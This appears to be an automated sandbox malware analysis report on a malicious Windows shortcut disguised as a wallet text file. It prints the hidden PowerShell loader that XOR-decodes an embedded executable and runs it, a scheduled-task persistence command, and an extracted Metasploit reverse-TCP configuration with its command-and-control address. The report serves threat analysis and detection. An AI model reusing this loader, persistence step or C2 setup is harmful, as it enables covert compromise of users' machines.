Overview

overview

10

Static

static

1

Browsers.txt.lnk

windows10-2004-x64

8

Browsers/F...xt.lnk

windows10-2004-x64

10

Discord.txt.lnk

windows10-2004-x64

8

Information.txt.lnk

windows10-2004-x64

8

Passwords.txt.lnk

windows10-2004-x64

8

Screen,jpg.lnk

windows10-2004-x64

1

Systeminfos.txt.lnk

windows10-2004-x64

8

Telegram.txt.lnk

windows10-2004-x64

8

Wallets/Ex...xt.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    203s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-12-2024 06:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Wallets/Exodus.txt.lnk

  • Size

    1.1MB

  • MD5

    f633c0331190af42493e0bd861853bbe

  • SHA1

    e51a46951bb42d8ea12e6d86c075d30c9b95b160

  • SHA256

    273a75ba90251e317ed6291e6d4e31f80ce006e81bdc6582a4988078dc5610ef

  • SHA512

    35a59bd65dfb15f7412904cc41f1d2eae39e5d15ce9963ff9251584d9b642060dcdf6c3b74f9ba358922d2a0b0baa04887697f4ed8e48bfeb7b2fe98e9861cc9

  • SSDEEP

    24576:BqdCjhtTdvhtTdvhtTdvhtTdvhtTdvhr8k:7htTdvhtTdvhtTdvhtTdvhtTdvhQk

Score
10/10
metasploitbackdoordiscoveryexecutiontrojanupx

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

104.248.194.233:443

Signatures

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

    trojanbackdoormetasploit
  • Metasploit family
    metasploit
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Wallets\Exodus.txt.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1296
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden $lnkpath = Get-ChildItem *.lnk ^| where-object {$_.length -eq 0x00117926} ^| Select-Object -ExpandProperty Name; $file = gc $lnkpath -Encoding Byte; for($i=0; $i -lt $file.count; $i++) { $file[$i] = $file[$i] -bxor 0x33 }; $path = 'C:\Users\Admin\AppData\Local\Temp\tmp' + (Get-Random) + '.exe'; sc $path ([byte[]]($file ^| select -Skip 002838)) -Encoding Byte; ^& $path;
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3616
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -windowstyle hidden $lnkpath = Get-ChildItem *.lnk | where-object {$_.length -eq 0x00117926} | Select-Object -ExpandProperty Name; $file = gc $lnkpath -Encoding Byte; for($i=0; $i -lt $file.count; $i++) { $file[$i] = $file[$i] -bxor 0x33 }; $path = 'C:\Users\Admin\AppData\Local\Temp\tmp' + (Get-Random) + '.exe'; sc $path ([byte[]]($file | select -Skip 002838)) -Encoding Byte; & $path;
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1888
        • C:\Users\Admin\AppData\Local\Temp\tmp445870504.exe
          "C:\Users\Admin\AppData\Local\Temp\tmp445870504.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4340
          • C:\Windows\SYSTEM32\schtasks.exe
            "schtasks.exe" /query /TN WinTask
            5⤵
              PID:4908
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /tn WinTask /tr C:\Users\Admin\AppData\Local\Temp\tmp445870504.exe /sc minute /mo 5
              5⤵
              • Scheduled Task/Job: Scheduled Task
              PID:3280
            • C:\Users\Admin\AppData\Local\Temp\qlgw2kn4.1nd.exe
              "C:\Users\Admin\AppData\Local\Temp\qlgw2kn4.1nd.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:368

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hvwodc5h.3jr.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\qlgw2kn4.1nd.exe
      Filesize

      47KB

      MD5

      090de6108919fa287445dcc327750a88

      SHA1

      c9edd286ffa8533ed76b4efa464753a1649f95b0

      SHA256

      4edf2a61c1a4af58990fe72a746d9b810cd173ddb40baf56231a580095b6c252

      SHA512

      4a89033e1fa619328fb5eb3a39a027d32061c96f1205240bc73d5ed6d6ad27e5e22cdf718855a476a6171c63e8b9e1b797a84fdcc30b38e2ac7c66a860ba75ca

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\tmp445870504.exe
      Filesize

      1.1MB

      MD5

      7889c4df19a5f4e678965812cdde1deb

      SHA1

      fbc034bae5de5bde878b364134a73d12cc3b47f5

      SHA256

      4cf48c2a3933ac4c6733533bf16d40fa4e411fbbf42b03d84d6c8df62e253ad0

      SHA512

      8642097d70fcd4dd46eda2ced82c3727ca4b27c19fc803568347cc4828e65bfce5aa4fc94b8fcf5d1b1aa21bfeecd865883c8be1b3717d7d76d82b838c836401

      Download Submit

    • memory/368-41-0x0000000000400000-0x0000000000419000-memory.dmp

      Filesize

      100KB

      Download

    • memory/368-38-0x0000000000400000-0x0000000000419000-memory.dmp

      Filesize

      100KB

      Download

    • memory/1888-14-0x00007FFA9AA60000-0x00007FFA9B521000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1888-0-0x00007FFA9AA63000-0x00007FFA9AA65000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1888-13-0x00007FFA9AA63000-0x00007FFA9AA65000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1888-24-0x00007FFA9AA60000-0x00007FFA9B521000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1888-12-0x00007FFA9AA60000-0x00007FFA9B521000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1888-11-0x00007FFA9AA60000-0x00007FFA9B521000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1888-1-0x0000019FABD50000-0x0000019FABD72000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4340-21-0x000001F16D800000-0x000001F16D91A000-memory.dmp

      Filesize

      1.1MB

      Download